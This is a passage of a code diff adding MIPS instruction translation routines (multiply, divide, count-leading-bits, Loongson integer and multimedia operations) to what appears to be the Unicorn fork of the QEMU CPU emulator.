"muhu"; + break; +#if defined(TARGET_MIPS64) + case R6_OPC_DDIV: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1ULL << 63); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_div_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "ddiv"; + break; + case R6_OPC_DMOD: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1ULL << 63); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_rem_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "dmod"; + break; + case R6_OPC_DDIVU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_divu_i64(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "ddivu"; + break; + case R6_OPC_DMODU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_remu_i64(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "dmodu"; + break; + case R6_OPC_DMUL: + tcg_gen_mul_i64(tcg_ctx, *cpu_gpr[rd], t0, t1); + opn = "dmul"; + break; + case R6_OPC_DMUH: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + 
tcg_gen_muls2_i64(tcg_ctx, t2, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t2); + } + opn = "dmuh"; + break; + case R6_OPC_DMULU: + tcg_gen_mul_i64(tcg_ctx, *cpu_gpr[rd], t0, t1); + opn = "dmulu"; + break; + case R6_OPC_DMUHU: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + tcg_gen_mulu2_i64(tcg_ctx, t2, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t2); + } + opn = "dmuhu"; + break; +#endif + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s %s", opn, regnames[rs], regnames[rt]); + out: + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_muldiv(DisasContext *ctx, uint32_t opc, + int acc, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_HI = (TCGv **)tcg_ctx->cpu_HI; + TCGv **cpu_LO = (TCGv **)tcg_ctx->cpu_LO; + const char *opn = "mul/div"; + TCGv t0, t1; + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + + if (acc != 0) { + check_dsp(ctx); + } + + switch (opc) { + case OPC_DIV: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_ext32s_tl(tcg_ctx, t1, t1); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_div_tl(tcg_ctx, *cpu_LO[acc], t0, t1); + tcg_gen_rem_tl(tcg_ctx, *cpu_HI[acc], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], *cpu_LO[acc]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], *cpu_HI[acc]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "div"; + break; + case OPC_DIVU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = 
tcg_const_tl(tcg_ctx, 1); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_divu_tl(tcg_ctx, *cpu_LO[acc], t0, t1); + tcg_gen_remu_tl(tcg_ctx, *cpu_HI[acc], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], *cpu_LO[acc]); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], *cpu_HI[acc]); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "divu"; + break; + case OPC_MULT: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_LO[acc], t2); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_HI[acc], t3); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "mult"; + break; + case OPC_MULTU: + { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); + tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); + tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_LO[acc], t2); + tcg_gen_ext_i32_tl(tcg_ctx, *cpu_HI[acc], t3); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free_i32(tcg_ctx, t3); + } + opn = "multu"; + break; +#if defined(TARGET_MIPS64) + case OPC_DDIV: + { + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1ULL << 63); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); + tcg_gen_and_tl(tcg_ctx, t2, t2, t3); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); + tcg_gen_or_tl(tcg_ctx, t2, t2, t3); + tcg_gen_movi_tl(tcg_ctx, t3, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); + tcg_gen_div_tl(tcg_ctx, *cpu_LO[acc], t0, t1); + tcg_gen_rem_tl(tcg_ctx, *cpu_HI[acc], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "ddiv"; + break; + 
case OPC_DDIVU: + { + TCGv t2 = tcg_const_tl(tcg_ctx, 0); + TCGv t3 = tcg_const_tl(tcg_ctx, 1); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); + tcg_gen_divu_i64(tcg_ctx, *cpu_LO[acc], t0, t1); + tcg_gen_remu_i64(tcg_ctx, *cpu_HI[acc], t0, t1); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } + opn = "ddivu"; + break; + case OPC_DMULT: + tcg_gen_muls2_i64(tcg_ctx, *cpu_LO[acc], *cpu_HI[acc], t0, t1); + opn = "dmult"; + break; + case OPC_DMULTU: + tcg_gen_mulu2_i64(tcg_ctx, *cpu_LO[acc], *cpu_HI[acc], t0, t1); + opn = "dmultu"; + break; +#endif + case OPC_MADD: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); + tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); + tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); + tcg_gen_concat_tl_i64(tcg_ctx, t3, *cpu_LO[acc], *cpu_HI[acc]); + tcg_gen_add_i64(tcg_ctx, t2, t2, t3); + tcg_temp_free_i64(tcg_ctx, t3); + tcg_gen_trunc_i64_tl(tcg_ctx, t0, t2); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], t1); + } + opn = "madd"; + break; + case OPC_MADDU: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); + tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); + tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); + tcg_gen_concat_tl_i64(tcg_ctx, t3, *cpu_LO[acc], *cpu_HI[acc]); + tcg_gen_add_i64(tcg_ctx, t2, t2, t3); + tcg_temp_free_i64(tcg_ctx, t3); + tcg_gen_trunc_i64_tl(tcg_ctx, t0, t2); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], t1); + } + opn = "maddu"; + break; + case OPC_MSUB: + { + TCGv_i64 t2 = 
tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); + tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); + tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); + tcg_gen_concat_tl_i64(tcg_ctx, t3, *cpu_LO[acc], *cpu_HI[acc]); + tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); + tcg_temp_free_i64(tcg_ctx, t3); + tcg_gen_trunc_i64_tl(tcg_ctx, t0, t2); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], t1); + } + opn = "msub"; + break; + case OPC_MSUBU: + { + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); + tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); + tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); + tcg_gen_concat_tl_i64(tcg_ctx, t3, *cpu_LO[acc], *cpu_HI[acc]); + tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); + tcg_temp_free_i64(tcg_ctx, t3); + tcg_gen_trunc_i64_tl(tcg_ctx, t0, t2); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, t1, t2); + tcg_temp_free_i64(tcg_ctx, t2); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_LO[acc], t0); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_HI[acc], t1); + } + opn = "msubu"; + break; + default: + MIPS_INVAL(opn); + generate_exception(ctx, EXCP_RI); + goto out; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s %s", opn, regnames[rs], regnames[rt]); + out: + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_mul_vr54xx (DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "mul vr54xx"; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + + switch (opc) { + case OPC_VR54XX_MULS: + gen_helper_muls(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + 
opn = "muls"; + break; + case OPC_VR54XX_MULSU: + gen_helper_mulsu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulsu"; + break; + case OPC_VR54XX_MACC: + gen_helper_macc(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "macc"; + break; + case OPC_VR54XX_MACCU: + gen_helper_maccu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "maccu"; + break; + case OPC_VR54XX_MSAC: + gen_helper_msac(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "msac"; + break; + case OPC_VR54XX_MSACU: + gen_helper_msacu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "msacu"; + break; + case OPC_VR54XX_MULHI: + gen_helper_mulhi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulhi"; + break; + case OPC_VR54XX_MULHIU: + gen_helper_mulhiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulhiu"; + break; + case OPC_VR54XX_MULSHI: + gen_helper_mulshi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulshi"; + break; + case OPC_VR54XX_MULSHIU: + gen_helper_mulshiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "mulshiu"; + break; + case OPC_VR54XX_MACCHI: + gen_helper_macchi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "macchi"; + break; + case OPC_VR54XX_MACCHIU: + gen_helper_macchiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "macchiu"; + break; + case OPC_VR54XX_MSACHI: + gen_helper_msachi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "msachi"; + break; + case OPC_VR54XX_MSACHIU: + gen_helper_msachiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); + opn = "msachiu"; + break; + default: + MIPS_INVAL("mul vr54xx"); + generate_exception(ctx, EXCP_RI); + goto out; + } + gen_store_gpr(tcg_ctx, t0, rd); + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s", opn, regnames[rd], regnames[rs], regnames[rt]); + + out: + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_cl (DisasContext *ctx, uint32_t opc, + int rd, int rs) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "CLx"; + TCGv t0; 
+ + if (rd == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + switch (opc) { + case OPC_CLO: + case R6_OPC_CLO: + gen_helper_clo(tcg_ctx, *cpu_gpr[rd], t0); + opn = "clo"; + break; + case OPC_CLZ: + case R6_OPC_CLZ: + gen_helper_clz(tcg_ctx, *cpu_gpr[rd], t0); + opn = "clz"; + break; +#if defined(TARGET_MIPS64) + case OPC_DCLO: + case R6_OPC_DCLO: + gen_helper_dclo(tcg_ctx, *cpu_gpr[rd], t0); + opn = "dclo"; + break; + case OPC_DCLZ: + case R6_OPC_DCLZ: + gen_helper_dclz(tcg_ctx, *cpu_gpr[rd], t0); + opn = "dclz"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s", opn, regnames[rd], regnames[rs]); + tcg_temp_free(tcg_ctx, t0); +} + +/* Godson integer instructions */ +static void gen_loongson_integer(DisasContext *ctx, uint32_t opc, + int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "loongson"; + TCGv t0, t1; + + if (rd == 0) { + /* Treat as NOP. 
*/ + MIPS_DEBUG("NOP"); + return; + } + + switch (opc) { + case OPC_MULT_G_2E: + case OPC_MULT_G_2F: + case OPC_MULTU_G_2E: + case OPC_MULTU_G_2F: +#if defined(TARGET_MIPS64) + case OPC_DMULT_G_2E: + case OPC_DMULT_G_2F: + case OPC_DMULTU_G_2E: + case OPC_DMULTU_G_2F: +#endif + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + break; + default: + t0 = tcg_temp_local_new(tcg_ctx); + t1 = tcg_temp_local_new(tcg_ctx); + break; + } + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + + switch (opc) { + case OPC_MULT_G_2E: + case OPC_MULT_G_2F: + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + opn = "mult.g"; + break; + case OPC_MULTU_G_2E: + case OPC_MULTU_G_2F: + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + opn = "multu.g"; + break; + case OPC_DIV_G_2E: + case OPC_DIV_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + int l3 = gen_new_label(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, t0, t0); + tcg_gen_ext32s_tl(tcg_ctx, t1, t1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, INT_MIN, l2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1, l2); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], t0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l2); + tcg_gen_div_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + gen_set_label(tcg_ctx, l3); + } + opn = "div.g"; + break; + case OPC_DIVU_G_2E: + case OPC_DIVU_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + 
tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_divu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + gen_set_label(tcg_ctx, l2); + } + opn = "divu.g"; + break; + case OPC_MOD_G_2E: + case OPC_MOD_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + int l3 = gen_new_label(tcg_ctx); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, INT_MIN, l2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l2); + tcg_gen_rem_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + gen_set_label(tcg_ctx, l3); + } + opn = "mod.g"; + break; + case OPC_MODU_G_2E: + case OPC_MODU_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + tcg_gen_ext32u_tl(tcg_ctx, t0, t0); + tcg_gen_ext32u_tl(tcg_ctx, t1, t1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_remu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], *cpu_gpr[rd]); + gen_set_label(tcg_ctx, l2); + } + opn = "modu.g"; + break; +#if defined(TARGET_MIPS64) + case OPC_DMULT_G_2E: + case OPC_DMULT_G_2F: + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + opn = "dmult.g"; + break; + case OPC_DMULTU_G_2E: + case OPC_DMULTU_G_2F: + tcg_gen_mul_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + opn = "dmultu.g"; + break; + case OPC_DDIV_G_2E: + case OPC_DDIV_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + int l3 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, 
*cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, -1ULL << 63, l2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1LL, l2); + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], t0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l2); + tcg_gen_div_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + gen_set_label(tcg_ctx, l3); + } + opn = "ddiv.g"; + break; + case OPC_DDIVU_G_2E: + case OPC_DDIVU_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_divu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + gen_set_label(tcg_ctx, l2); + } + opn = "ddivu.g"; + break; + case OPC_DMOD_G_2E: + case OPC_DMOD_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + int l3 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, -1ULL << 63, l2); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1LL, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l3); + gen_set_label(tcg_ctx, l2); + tcg_gen_rem_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + gen_set_label(tcg_ctx, l3); + } + opn = "dmod.g"; + break; + case OPC_DMODU_G_2E: + case OPC_DMODU_G_2F: + { + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rd], 0); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_remu_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + gen_set_label(tcg_ctx, l2); + } + opn = "dmodu.g"; + break; +#endif + } + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s", opn, regnames[rd], regnames[rs]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +/* Loongson multimedia instructions */ +static void 
gen_loongson_multimedia(DisasContext *ctx, int rd, int rs, int rt) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "loongson_cp2"; + uint32_t opc, shift_max; + TCGv_i64 t0, t1; + + opc = MASK_LMI(ctx->opcode); + switch (opc) { + case OPC_ADD_CP2: + case OPC_SUB_CP2: + case OPC_DADD_CP2: + case OPC_DSUB_CP2: + t0 = tcg_temp_local_new_i64(tcg_ctx); + t1 = tcg_temp_local_new_i64(tcg_ctx); + break; + default: + t0 = tcg_temp_new_i64(tcg_ctx); + t1 = tcg_temp_new_i64(tcg_ctx); + break; + } + + gen_load_fpr64(ctx, t0, rs); + gen_load_fpr64(ctx, t1, rt); + +#define LMI_HELPER(UP, LO) \ + case OPC_##UP: gen_helper_##LO(tcg_ctx, t0, t0, t1); opn = #LO; break +#define LMI_HELPER_1(UP, LO) \ + case OPC_##UP: gen_helper_##LO(tcg_ctx, t0, t0); opn = #LO; break +#define LMI_DIRECT(UP, LO, OP) \ + case OPC_##UP: tcg_gen_##OP##_i64(tcg_ctx, t0, t0, t1); opn = #LO; break + + switch (opc) { + LMI_HELPER(PADDSH, paddsh); + LMI_HELPER(PADDUSH, paddush); + LMI_HELPER(PADDH, paddh); + LMI_HELPER(PADDW, paddw); + LMI_HELPER(PADDSB, paddsb); + LMI_HELPER(PADDUSB, paddusb); + LMI_HELPER(PADDB, paddb); + + LMI_HELPER(PSUBSH, psubsh); + LMI_HELPER(PSUBUSH, psubush); + LMI_HELPER(PSUBH, psubh); + LMI_HELPER(PSUBW, psubw); + LMI_HELPER(PSUBSB, psubsb); + LMI_HELPER(PSUBUSB, psubusb); + LMI_HELPER(PSUBB, psubb); + + LMI_HELPER(PSHUFH, pshufh); + LMI_HELPER(PACKSSWH, packsswh); + LMI_HELPER(PACKSSHB, packsshb); + LMI_HELPER(PACKUSHB, packushb); + + LMI_HELPER(PUNPCKLHW, punpcklhw); + LMI_HELPER(PUNPCKHHW, punpckhhw); + LMI_HELPER(PUNPCKLBH, punpcklbh); + LMI_HELPER(PUNPCKHBH, punpckhbh); + LMI_HELPER(PUNPCKLWD, punpcklwd); + LMI_HELPER(PUNPCKHWD, punpckhwd); + + LMI_HELPER(PAVGH, pavgh); + LMI_HELPER(PAVGB, pavgb); + LMI_HELPER(PMAXSH, pmaxsh); + LMI_HELPER(PMINSH, pminsh); + LMI_HELPER(PMAXUB, pmaxub); + LMI_HELPER(PMINUB, pminub); + + LMI_HELPER(PCMPEQW, pcmpeqw); + LMI_HELPER(PCMPGTW, pcmpgtw); + LMI_HELPER(PCMPEQH, pcmpeqh); + LMI_HELPER(PCMPGTH, pcmpgth); + 
